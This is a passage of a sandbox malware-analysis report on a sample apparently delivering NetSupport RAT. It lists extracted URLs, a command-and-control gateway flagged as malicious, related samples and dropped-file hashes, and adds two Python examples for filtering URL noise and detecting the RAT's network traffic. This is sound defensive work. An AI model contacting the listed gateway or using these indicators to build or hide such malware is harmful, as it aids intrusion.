                                                                          http://www.array.comDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://geo.netsupportsoftware.comlocation/loca.aspDisplayPhotoViewer.exe, 00000006.00000002.3125781981.000000000B230000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.nero.comDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                            high
                                                                            https://xiph.org/flac/;LosslessDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                              high
                                                                              http://winace.comDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://mirror01.iptelecom.net.ua/~video/codecs/CUseeMe.JPEG.CODEC.v1.17.exeDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.nerodigital.comDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.real.com;;;;;;LosslessDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://mirror01.iptelecom.net.ua/~video/codecs/PICVideo.Lossless.JPEG.codec.v2.10.27.exe;;;YUVDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://pbcore.org/xsd/pbcore-2.0.xsdhttp://www.pbcore.org/PBCore/PBCoreNamespace.htmlDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://www.r-wipe.com/#win-touchhttps://secure.r-tt.com/cgi-bin/Store?P=513mailto:salesMerge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3154572548.0000000068B3F000.00000002.00000001.01000000.0000000D.sdmp, RwcTouch.dll.0.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.digitalvoodoo.net/;;;DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://mediaxw.sourceforge.netDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.playon.tv/playlaterDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://html4/loose.dtdDisplayPhotoViewer.exe, 00000006.00000002.3214284754.000000006B1C4000.00000002.00000001.01000000.00000007.sdmpfalse
                                                                                high
                                                                                https://www.3delite.hu/Object%20Pascal%20Developer%20Resources/filesystemdialogs.htmlDisplayPhotoViewer.exe, 00000006.00000000.2549778994.0000000001132000.00000002.00000001.01000000.00000005.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.netsupportschool.com/tutor-assistant.asp118DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.q-team.de;;;DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.cineform.com/products/ConnectHD.htmDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://amamaman.hp.infoseek.co.jp/english/amv2_e.html;;;DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.digicine.com/PROTO-ASDCP-PKL-20040311#http://www.smpte-ra.org/schemas/429-8/2007/PKLhttp:DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://sourceforge.net/project/showfiles.php?group_id=82303&package_id=84358;;;YUVDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                    high
                                                                                    http://quoteunquoteapps.comhttp://basicrecipe.comCopyrightDisplayPhotoViewer.exe, 00000006.00000002.3214284754.000000006B041000.00000002.00000001.01000000.00000007.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://www.fourcc.org/indexrgb.htm;;;RGBDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://diracvideo.org/DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://ffdshow-tryout.sourceforge.net/DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://www.chiariglione.org/mpeg/technologies/mp04-sls/index.htm;LosslessDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://www.webmproject.org;;;YUV;4:2:0DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://eprints.ecs.soton.ac.uk/archive/00001310/01/VTC97-js.pdfDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://www.cyberlink.com;;;DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://www.nue.tu-berlin.de/forschung/projekte/lossless/mp4als.html#downloadsDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://mirror01.iptelecom.net.ua/~video/codecs/Pinnacle.ReelTime.v2.5.software.only.codec.exe;;;YUVDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
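Almost every row in the table above comes from one and the same memory dump and is a codec-vendor reference string, not a host the sample contacted; the handful of URLs that live in other dumps (127.0.0.1 and the two NetSupport endpoints) are the ones worth a closer look. The following is an added example, not part of the report and not Joe Sandbox code: it parses rows in the fused form of the report's text export (URL, source list and Malicious flag run together), splits URL from source, groups URLs by the container they were found in, and returns the URLs confined to sparse containers. The two process names, the shape of the dump identifier, the noise threshold and the reading of the dense dump as MediaInfo's string table are assumptions taken from this page; the dump-id fields are treated as an opaque key.

```python
import re
from collections import defaultdict

# Constructed input: seven rows copied from the URL table of this report, in the fused
# form of the text export (URL, then the source list, then the Malicious flag, no
# separators between them). Not the whole table.
RAW_ROWS = [
    "http://www.loc.gov/mix/v20xmlns:mixhttp://www.loc.gov/mix/v20DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse",
    "http://127.0.0.1DisplayPhotoViewer.exe, DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpfalse",
    "http://www.musepack.net;LossyDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse",
    "https://secure.r-tt.com/UserConsole.shtmlopenDisplayPhotoViewer.exe, 00000006.00000002.3154572548.0000000068B3F000.00000002.00000001.01000000.0000000D.sdmp, RwcTouch.dll.0.drfalse",
    "http://geo.netsupportsoftware.comlocation/loca.aspDisplayPhotoViewer.exe, 00000006.00000002.3125781981.000000000B230000.00000004.00000020.00020000.00000000.sdmpfalse",
    "http://www.nero.comDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse",
    "http://www.netsupportschool.com/tutor-assistant.asp118DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmpfalse",
]

# The source list starts at the first process name followed by ", " (or end of row).
# Only the two process names seen on this page are known here (assumption); extend the
# alternation for other reports.
SRC_START = re.compile(r"(?=(?:Merge|DisplayPhotoViewer)\.exe(?:, |$))")
# Shape of a memory-dump identifier as printed on this page. The fields are not
# interpreted; the whole id is used as an opaque container key.
DUMP_RE = re.compile(r"\d{8}\.\d{8}\.\d+\.[0-9A-F]{16}(?:\.\d{8}){3}\.[0-9A-F]{8}\.sdmp")


def parse_row(row):
    """Split one fused row into (url, source_tokens, malicious)."""
    malicious = None
    for flag in ("false", "true"):
        if row.endswith(flag):
            malicious, row = flag == "true", row[: -len(flag)]
            break
    m = SRC_START.search(row)
    if m is None:
        raise ValueError(f"no source list found in row: {row!r}")
    return row[: m.start()], row[m.start():].split(", "), malicious


def source_keys(tokens):
    """Containers a string was found in: a dump id, a dropped-file reference (*.dr),
    or a process image listed on its own (a process name directly followed by a dump
    id is just the owner of that dump, not a container of its own)."""
    keys, pending = set(), None
    for tok in tokens:
        if DUMP_RE.fullmatch(tok):
            keys.add(tok)
            pending = None
        elif tok.endswith(".dr"):
            keys.add(tok)
        else:
            if pending is not None:
                keys.add(pending + " (image)")
            pending = tok
    if pending is not None:
        keys.add(pending + " (image)")
    return keys


def group_by_container(rows):
    """Map each container key to the set of URLs extracted from it."""
    by_key = defaultdict(set)
    for row in rows:
        url, tokens, _ = parse_row(row)
        for key in source_keys(tokens):
            by_key[key].add(url)
    return by_key


def low_density_urls(rows, noise_threshold=3):
    """URLs none of whose containers hold `noise_threshold` or more distinct URLs.
    One dump carrying dozens of unrelated vendor URLs is library string data (on this
    page that is consistent with the dropped MediaInfo.dll; an interpretation, not a
    report finding). URLs confined to sparse containers are the ones to read by hand."""
    by_key = group_by_container(rows)
    dense = {k for k, urls in by_key.items() if len(urls) >= noise_threshold}
    keep = set()
    for row in rows:
        url, tokens, _ = parse_row(row)
        if not (source_keys(tokens) & dense):
            keep.add(url)
    return sorted(keep)


def clean_url(url):
    """Strip the commonest string-extraction residue: a ';'-separated tail and a second
    URL glued onto the first. Other glued tokens ('open', '118') still need a human."""
    url = url.split(";", 1)[0]
    nxt = url.find("http", 1)
    return url[:nxt] if nxt > 0 else url


if __name__ == "__main__":
    for url in low_density_urls(RAW_ROWS):
        print(clean_url(url))
```

With the full table and the default threshold the same three non-library URLs surface, because the dump at 0000000069D4D000 alone accounts for the codec references; raise the threshold if a report has several bundled libraries.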
IP | Domain | Country | ASN | ASN Name | Malicious
162.33.178.193 | dirklend.com | United States | 14390 | CORENETUS | true
104.26.1.231 | geo.netsupportsoftware.com | United States | 13335 | CLOUDFLARENETUS | false
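The two rows above are the hunt pivot this report supports. geo.netsupportsoftware.com is NetSupport's own geolocation endpoint (the report marks it non-malicious, and the related-samples tables later in this section show it contacted by many other NetSupport RAT analyses), so on its own it only proves that a NetSupport client is running; what makes it actionable is which image performs the lookup and whether that same image also reaches the gateway flagged as malicious. The following is an added example, not Joe Sandbox output and not NetSupport code: the event schema, the expected install paths of a sanctioned NetSupport deployment, the DisplayPhotoViewer.exe path (taken from the dropped-file location this report lists for MediaInfo.dll) and the sample events are all constructed.

```python
import ipaddress
from collections import defaultdict

# Indicators from the contacted-IP table of this report: the NetSupport geolocation
# lookup (vendor endpoint, Malicious=false) and the gateway marked Malicious=true.
GEO_HOST = "geo.netsupportsoftware.com"
GEO_PATH = "/location/loca.asp"
FLAGGED_HOSTS = {"dirklend.com"}
FLAGGED_IPS = {ipaddress.ip_address("162.33.178.193")}

# Assumption for this example: where a sanctioned NetSupport Manager install is
# expected to run from. Replace with the organisation's own software inventory.
EXPECTED_NETSUPPORT_PREFIXES = (
    "c:\\program files\\netsupport\\",
    "c:\\program files (x86)\\netsupport\\",
)

RULE_GEO = "netsupport_geo_lookup_from_unexpected_image"
RULE_C2 = "known_netsupport_rat_gateway"


def classify(event):
    """Rules tripped by one outbound connection (Sysmon event 3 style fields plus the
    proxy's URL path). The geo lookup by itself is not malicious; it only says a
    NetSupport client is running, so it is judged by where that client runs from."""
    hits = []
    image = event["image"].lower()
    dest_host = event.get("dest_host", "").lower()
    dest_ip = ipaddress.ip_address(event["dest_ip"])
    if dest_host == GEO_HOST and event.get("url", "").startswith(GEO_PATH):
        if not image.startswith(EXPECTED_NETSUPPORT_PREFIXES):
            hits.append(RULE_GEO)
    if dest_host in FLAGGED_HOSTS or dest_ip in FLAGGED_IPS:
        hits.append(RULE_C2)
    return hits


def correlate(events):
    """Group hits per (host, image). Severity is 'high' when the same image both did
    the out-of-place geo lookup and reached a flagged gateway, 'medium' otherwise."""
    rules_by = defaultdict(set)
    for ev in events:
        for rule in classify(ev):
            rules_by[(ev["host"], ev["image"])].add(rule)
    findings = {}
    for key, rules in rules_by.items():
        severity = "high" if {RULE_GEO, RULE_C2} <= rules else "medium"
        findings[key] = (severity, sorted(rules))
    return findings


# Constructed events. RAT_IMAGE is assumed to sit next to the MediaInfo.dll this report
# lists under ...\Advanced Photo Studio\; WS02 and WS03 are invented benign baseline.
RAT_IMAGE = r"C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe"
SAMPLE_EVENTS = [
    {"host": "WS01", "image": RAT_IMAGE,
     "dest_host": GEO_HOST, "dest_ip": "104.26.1.231", "url": GEO_PATH},
    {"host": "WS01", "image": RAT_IMAGE,
     "dest_host": "dirklend.com", "dest_ip": "162.33.178.193", "url": "/"},
    {"host": "WS02", "image": r"C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe",
     "dest_host": GEO_HOST, "dest_ip": "104.26.1.231", "url": GEO_PATH},
    {"host": "WS03", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest_host": "example.org", "dest_ip": "93.184.216.34", "url": "/"},
]

if __name__ == "__main__":
    for (host, image), (severity, rules) in correlate(SAMPLE_EVENTS).items():
        print(f"{severity:6} {host} {image}: {', '.join(rules)}")
```

The sanctioned client on WS02 produces no finding even though it performs the identical lookup; the image path, not the destination, carries the signal. The C2 rule keys on both name and address because the report lists the gateway under a domain and a single IP and a resolver change would otherwise break it.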
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1575379
Start date and time: 2024-12-15 11:49:12 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 1s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Merge.exe
Detection: MAL
Classification: mal42.rans.spyw.evad.winEXE@3/44@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ocsps.ssl.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
05:51:33 | API Interceptor | 17x Sleep call for process: DisplayPhotoViewer.exe modified
Match: 104.26.1.231
Associated Sample Name / URL | Detection | Threat Name | Context
5q1Wm5VlqL.exe | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
Update.js | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
file.exe | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
Pyyidau.vbs | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
file.exe | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
file.exe | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | geo.netsupportsoftware.com/location/loca.asp
Advanced_IP_Scanner_2.5.4594.12.exe | malicious | NetSupport RAT, NetSupport Downloader | geo.netsupportsoftware.com/location/loca.asp
Advanced_IP_Scanner_2.5.4594.12.exe | malicious | NetSupport RAT, NetSupport Downloader | geo.netsupportsoftware.com/location/loca.asp
file.exe | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
Match: geo.netsupportsoftware.com
Associated Sample Name / URL | Detection | Threat Name | Context
lFxGd66yDa.exe | malicious | NetSupport RAT | 104.26.0.231
Jjv9ha2GKn.exe | malicious | NetSupport RAT, DarkTortilla | 104.26.0.231
5q1Wm5VlqL.exe | malicious | NetSupport RAT | 104.26.1.231
Update.js | malicious | NetSupport RAT | 104.26.1.231
file.exe | malicious | NetSupport RAT | 104.26.0.231
file.exe | malicious | NetSupport RAT | 104.26.1.231
Pyyidau.vbs | malicious | NetSupport RAT | 104.26.1.231
Pyyidau.vbs | malicious | NetSupport RAT | 104.26.0.231
file.exe | malicious | NetSupport RAT | 104.26.0.231
Match: CORENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
xd.ppc.elf | malicious | Mirai | 162.33.165.243
http://esaleerugs.com | malicious | Unknown | 162.33.178.63
https://esaleerugs.com | malicious | Unknown | 162.33.178.63
http://mcajijknegnbbga.top | malicious | Unknown | 162.33.178.216
https://mercro.com/ | malicious | Unknown | 162.33.178.59
http://mercro.com | malicious | Unknown | 162.33.178.59
la.bot.arm5.elf | malicious | Mirai | 208.100.216.187
la.bot.arm5.elf | malicious | Unknown | 69.72.73.31
http://tayakay.com | malicious | Unknown | 162.33.178.75
https://tayakay.com/analytics.js | malicious | Unknown | 162.33.178.75

Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 172.67.207.38
wN8pQhRNnu.exe | malicious | LummaC | 172.67.179.207
AZCFTWko2q.exe | malicious | LummaC | 172.67.207.38
I37faEaz1K.exe | malicious | LummaC | 172.67.207.38
YbJEkgZ4z5.exe | malicious | LummaC | 172.67.207.38
3cb2b5U8BR.exe | malicious | LummaC | 172.67.207.38
afXf6ZiYTT.exe | malicious | LummaC | 172.67.207.38
ZideZBMwUQ.exe | malicious | LummaC | 172.67.207.38
hKyD3sj3Y9.exe | malicious | LummaC | 172.67.207.38
P0w3gV5bH3.exe | malicious | LummaC | 104.21.64.1
                                                                                    No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\MediaInfo.dll | SecuriteInfo.com.Trojan.Win32.Agent.3214.8517.exe | malicious | Petite Virus |
 | ClipPlusCommunitySetup_ns.msi | malicious | LummaC, Babadeda, LummaC Stealer, Petite Virus |
 | ClipPlusCommunitySetup.msi | malicious | LummaC, Babadeda, LummaC Stealer, Petite Virus |
 | SecuriteInfo.com.W32.AutoIt.TB.gen.Eldorado.23184.1036.exe | malicious | Unknown |
 | a1RkNY3NwQ.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\FreeImage.dll | ClipPlusCommunitySetup_ns.msi | malicious | LummaC, Babadeda, LummaC Stealer, Petite Virus |
 | ClipPlusCommunitySetup.msi | malicious | LummaC, Babadeda, LummaC Stealer, Petite Virus |

Process: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
File Type: Unicode text, UTF-16, little-endian text, with no line terminators
Category: dropped
Size (bytes): 2
Entropy (8bit): 1.0
Encrypted: false
SSDEEP: 3:Qn:Qn
MD5: F3B25701FE362EC84616A93A45CE9998
SHA1: D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256: B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512: 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious: false
Reputation: high, very likely benign file
Preview: ..

Process: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 498
Entropy (8bit): 5.103913616294899
Encrypted: false
SSDEEP: 12:TMbhJpIO1mcROtW/yF0T8YA+it/0zsFE/TYEGs/4w:qhJ+CTRSnF1wlwFUY6
MD5: 90BE2701C8112BEBC6BD58A7DE19846E
SHA1: A95BE407036982392E2E684FB9FF6602ECAD6F1E
SHA-256: 644FBCDC20086E16D57F31C5BAD98BE68D02B1C061938D2F5F91CBE88C871FBF
SHA-512: D618B473B68B48D746C912AC5FC06C73B047BD35A44A6EFC7A859FE1162D68015CF69DA41A5DB504DCBC4928E360C095B32A3B7792FCC6A38072E1EBD12E7CBE
Malicious: false
Reputation: moderate, very likely benign file
Preview: <?xml version="1.0" standalone="yes"?>..<!DOCTYPE document [..<!ELEMENT document (node*)>.. <!ATTLIST document WMSNameSpaceVersion CDATA "2.0">....<!ELEMENT node (node*)>.. <!ATTLIST node name CDATA #REQUIRED>.. <!ATTLIST node opcode ( create | remove | setval | clearval | rename | movebefore ) #REQUIRED>.. <!ATTLIST node secure ( true | false ) #IMPLIED>.. <!ATTLIST node type ( string | boolean | int32 | binary | int64 ) #IMPLIED>.. <!ATTLIST node value CDATA #IMPLIED>..]>..

Process: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
File Type: exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 10191
Entropy (8bit): 4.792342140217129
Encrypted: false
SSDEEP: 96:/YkZRAF6zyHUhm77yB1pZYCEnfHrHH7B6xTGH+YCLV3zwULJEYCJWyHBt3zwFRh+:/2FV0bBPCfUdY
MD5: 7050D5AE8ACFBE560FA11073FEF8185D
SHA1: 5BC38E77FF06785FE0AEC5A345C4CCD15752560E
SHA-256: CB87767C4A384C24E4A0F88455F59101B1AE7B4FB8DE8A5ADB4136C5F7EE545B
SHA-512: A7A295AC8921BB3DDE58D4BCDE9372ED59DEF61D4B7699057274960FA8C1D1A1DAFF834A93F7A0698E9E5C16DB43AF05E9FD2D6D7C9232F7D26FFCFF5FC5900B
Malicious: false
Reputation: moderate, very likely benign file
Preview: .<document WMSNameSpaceVersion="2.0">.... <node name="Control Protocol" opcode="create" >.. <node name="Object Store" opcode="create" >.. <node name="RTSP" opcode="create" >.. <node name="CLSID" opcode="create" type="string" value="{308786f0-8b15-11d2-b25f-006097d2e41e}" />.. <node name="Enabled" opcode="create" type="int32" value="0x1" />.. <node name="Properties" opcode="create" >.. <node name="Protocol" opcode="create" type="string" value="RTSP,RTSPA,RTSPT,RTSPU,RTSPM" />.. </node> Properties -->.... </node> RTSP -->.... <node name="Sessionless Multicast" opcode="create" >.. <node name="CLSID" opcode="create" type="string" value="{f9377800-f38d-11d2-b26c-006097d2e41e}" />.. <node name="Enabled" opcode="create" type="int32" value="0x1" />.. <node name="Properties" opcode="create" >.. <node name="Protocol" opcode="create" type="string" value="MCAST,RTP" />.. </node> Properties

Process: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
File Type: exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 10191
Entropy (8bit): 4.792342140217129
Encrypted: false
SSDEEP: 96:/YkZRAF6zyHUhm77yB1pZYCEnfHrHH7B6xTGH+YCLV3zwULJEYCJWyHBt3zwFRh+:/2FV0bBPCfUdY
MD5: 7050D5AE8ACFBE560FA11073FEF8185D
SHA1: 5BC38E77FF06785FE0AEC5A345C4CCD15752560E
SHA-256: CB87767C4A384C24E4A0F88455F59101B1AE7B4FB8DE8A5ADB4136C5F7EE545B
SHA-512: A7A295AC8921BB3DDE58D4BCDE9372ED59DEF61D4B7699057274960FA8C1D1A1DAFF834A93F7A0698E9E5C16DB43AF05E9FD2D6D7C9232F7D26FFCFF5FC5900B
Malicious: false
Reputation: moderate, very likely benign file
Preview: .<document WMSNameSpaceVersion="2.0">.... <node name="Control Protocol" opcode="create" >.. <node name="Object Store" opcode="create" >.. <node name="RTSP" opcode="create" >.. <node name="CLSID" opcode="create" type="string" value="{308786f0-8b15-11d2-b25f-006097d2e41e}" />.. <node name="Enabled" opcode="create" type="int32" value="0x1" />.. <node name="Properties" opcode="create" >.. <node name="Protocol" opcode="create" type="string" value="RTSP,RTSPA,RTSPT,RTSPU,RTSPM" />.. </node> Properties -->.... </node> RTSP -->.... <node name="Sessionless Multicast" opcode="create" >.. <node name="CLSID" opcode="create" type="string" value="{f9377800-f38d-11d2-b26c-006097d2e41e}" />.. <node name="Enabled" opcode="create" type="int32" value="0x1" />.. <node name="Properties" opcode="create" >.. <node name="Protocol" opcode="create" type="string" value="MCAST,RTP" />.. </node> Properties

Process: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 53
Entropy (8bit): 4.66869469064966
Encrypted: false
SSDEEP: 3:sLRaE92JWyhHX9ovy4dduRun:sLzTyRXKvndI0
MD5: A9B5DA9AEC61657B32393D96217165F0
SHA1: 80B5C577155ACD269B450D70F6B2CBED693EDF49
SHA-256: 9F4611369CF65B33D886489B2486FCA7B1E83E0DC998D35B15B3AA4C8478A28D
SHA-512: 0B73B232C03FFD5CE526A1EDE481A57C753D15D9EE39D4247ABFA52819B59FA676C63E30825DAF233E3139038C353DF84D652C4CE2CB71A706DDDBDFE0C70335
Malicious: false
Preview: <document WMSNameSpaceVersion="2.0">....</document>..

Process: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
File Type: data
Category: modified
Size (bytes): 5374844
Entropy (8bit): 7.999225815226051
Encrypted: true
SSDEEP: 98304:5EizXILuNATgrvUxj0W6RaECRe8+LxKNVEJMjbtA5Joe5b/1qzoWl3:5EIXkSrWj01aECbJu5JT5b6
MD5: 2032BA4077E20E526DFA680DC34A523E
SHA1: 816D5F6AC9D3F7688CD12AC737FBA026B65DC868
SHA-256: B29882E9AE0CC3DB866A37153389E6C92A67298A5971187C59433DF55782D153
SHA-512: 0A2D1BC2FA7066BB64C308B05E3C67645B94FC18BCA27928D2D3DF697476B38899A46088EB6D4C1EE5A6311E1167B6EFE942B3EAD5FEE8236F04BF72ACAA1176
Malicious: false
